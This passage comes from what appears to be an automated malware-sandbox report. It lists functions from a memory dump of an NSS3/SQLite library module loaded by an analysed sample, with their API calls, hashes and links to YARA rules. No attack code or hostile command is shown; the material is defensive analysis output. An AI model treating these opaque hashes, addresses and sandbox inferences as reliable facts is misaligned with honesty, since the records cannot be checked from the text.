                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C472DB8
                                                                                                                                                                                                                          • free.MOZGLUE ref: 6C472DC8
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                            • Part of subcall function 6C473E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3941837925-0
                                                                                                                                                                                                                          • Opcode ID: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                          • Instruction ID: 3522171bff8407541051e41f7df236291e4f320a610454ec27a29fc41b0218e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A751CD71A04212DFEB30DE29DD88F9B77E5EF94209F15042CE85997710EB31E8158BE2
                                                                                                                                                                                                                          Function 6C477CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C477CFD
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599030), ref: 6C477D1B
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599048), ref: 6C477D2F
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C477D50
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C477D61
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C477D7D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C477D9C
                                                                                                                                                                                                                          • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C477DB8
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C477E19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 70581797-0
                                                                                                                                                                                                                          • Opcode ID: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                          • Instruction ID: 01b22feebc8c20d636def9af56bb492de22723d514110722c13da409644a13c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D41E372A0411A9BEB21DE699D41FEF37A8EF4035DF450128EC19A7B50E730ED1986F1
                                                                                                                                                                                                                          Function 6C487EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F15
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F36
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C4880DD), ref: 6C487F3D
                                                                                                                                                                                                                          • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C4880DD), ref: 6C487F5D
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C4880DD), ref: 6C487F94
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C487F9B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08B,00000000,6C4880DD), ref: 6C487FD0
                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C4880DD), ref: 6C487FE6
                                                                                                                                                                                                                          • free.MOZGLUE(?,6C4880DD), ref: 6C48802D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4037168058-0
                                                                                                                                                                                                                          • Opcode ID: ef1164c65a63d3e463b076d3b8f1b757ad7fed1d5bac34f5cd6479de38475e70
                                                                                                                                                                                                                          • Instruction ID: df2b79ba8323f52a9fabf6919091cdd86510612b7c25b9f323a5c58b2771ada3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1164c65a63d3e463b076d3b8f1b757ad7fed1d5bac34f5cd6479de38475e70
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5441A371B062108BDB10DFF98C88E4A37B5AB47359F16822DEA1587B40D731F805CBAD
                                                                                                                                                                                                                          Function 6C4CFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4CFF00
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF18
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4CFF26
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF4F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4CFF7A
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C4CFF8C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1233137751-0
                                                                                                                                                                                                                          • Opcode ID: bde2fe0cdc6b7becb0cde46117056ac7bc02c8aff8b5ec38d2e214a0fc7be88c
                                                                                                                                                                                                                          • Instruction ID: 915c4b188bf93ae77699ebb433169b9724c48e6b517f2bda1047e52a7cdd36fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde2fe0cdc6b7becb0cde46117056ac7bc02c8aff8b5ec38d2e214a0fc7be88c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 933153BAA023129BFB10DE599C40F5A76F8EF46349F12013AED1887B50EB34E904C3D2
                                                                                                                                                                                                                          Function 6C417D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E27
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E67
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C417EED
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417F2E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                          • Opcode ID: 1de06aca462f1cf3f041b998b0925f82680998f48ccdf20218dd5c382ac6f931
                                                                                                                                                                                                                          • Instruction ID: c63e1a464e727407290dd1ce4687d38c3c8642baef02a4bbffa377e7947bfc65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de06aca462f1cf3f041b998b0925f82680998f48ccdf20218dd5c382ac6f931
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA619D74A083059FDB05CF29C890FAA37A2BF85308F1549A8EC495BB52D735EC56CBA1
                                                                                                                                                                                                                          Function 6C3FFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFD7A
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFD94
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFE3C
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFE83
                                                                                                                                                                                                                            • Part of subcall function 6C3FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C3FFEFA
                                                                                                                                                                                                                            • Part of subcall function 6C3FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C3FFF3B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 1169254434-598938438
                                                                                                                                                                                                                          • Opcode ID: 9d131cabae4c862a37363f865ae17fe912a0eddb7f042d942617ca6e01b0000d
                                                                                                                                                                                                                          • Instruction ID: 32202e36743641ba54e7a928aad86044cf82871de84ca93be2fa03955e78bc19
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d131cabae4c862a37363f865ae17fe912a0eddb7f042d942617ca6e01b0000d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4517E71A002059FDB04CFA9C890AAEBBF5AF4C308F144469EE15AB756E735EC41CFA1
                                                                                                                                                                                                                          Function 6C542F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C542FFD
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C543007
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C543032
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C543073
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C5430B3
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C5430C0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C5430BB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                          • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                          • API String ID: 750880481-4279182443
                                                                                                                                                                                                                          • Opcode ID: 6bde412d4f48ca4098a6d72fa44dd9f51b55dfa4375a76f5efeb2ce152ac549e
                                                                                                                                                                                                                          • Instruction ID: bd296f57ce112e3525189afcaa8693ba3d074847843b2dd63638abca983b1b04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bde412d4f48ca4098a6d72fa44dd9f51b55dfa4375a76f5efeb2ce152ac549e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F41BE71600606ABDB10CF25DC80A8AB7B5FF94369F14CA28EC698BB50E731F955CBD1
                                                                                                                                                                                                                          Function 6C4C5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]Ll), ref: 6C4C5F0A
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C5F1F
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(89000904), ref: 6C4C5F2F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(890008E8), ref: 6C4C5F55
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C5F6D
                                                                                                                                                                                                                          • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C4C5F7D
                                                                                                                                                                                                                            • Part of subcall function 6C4C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C4C5F82,8B4274C0), ref: 6C4C5248
                                                                                                                                                                                                                            • Part of subcall function 6C4C5220: EnterCriticalSection.KERNEL32(0F6C590D,?,6C4C5F82,8B4274C0), ref: 6C4C525C
                                                                                                                                                                                                                            • Part of subcall function 6C4C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C4C528E
                                                                                                                                                                                                                            • Part of subcall function 6C4C5220: PR_Unlock.NSS3(0F6C58F1), ref: 6C4C5299
                                                                                                                                                                                                                            • Part of subcall function 6C4C5220: free.MOZGLUE(00000000), ref: 6C4C52A9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                          • String ID: q]Ll
                                                                                                                                                                                                                          • API String ID: 3150690610-2389411964
                                                                                                                                                                                                                          • Opcode ID: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                          • Instruction ID: e4d1f074e7704d1cf2365ad76fd5034e038640adcbaffb25e16ebf834c85eb66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF21E4B5E002149BDB00EF64EC41FEEB7B4EF49318F540029E80AA7710E731A904CBD1
                                                                                                                                                                                                                          Function 6C488CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C49124D,00000001), ref: 6C488D19
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C49124D,00000001), ref: 6C488D32
                                                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D73
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488DBA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                                                          • Opcode ID: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                          • Instruction ID: 0815e0f8eebf7ee43174b1a6fca95840e92f85d1ed8964273777b8df50d1f5e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4321A1B5A05601CFDB40EF38C884D5AB7F0FF95319F15896AD8998B701D730E882CB91
                                                                                                                                                                                                                          Function 6C580ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
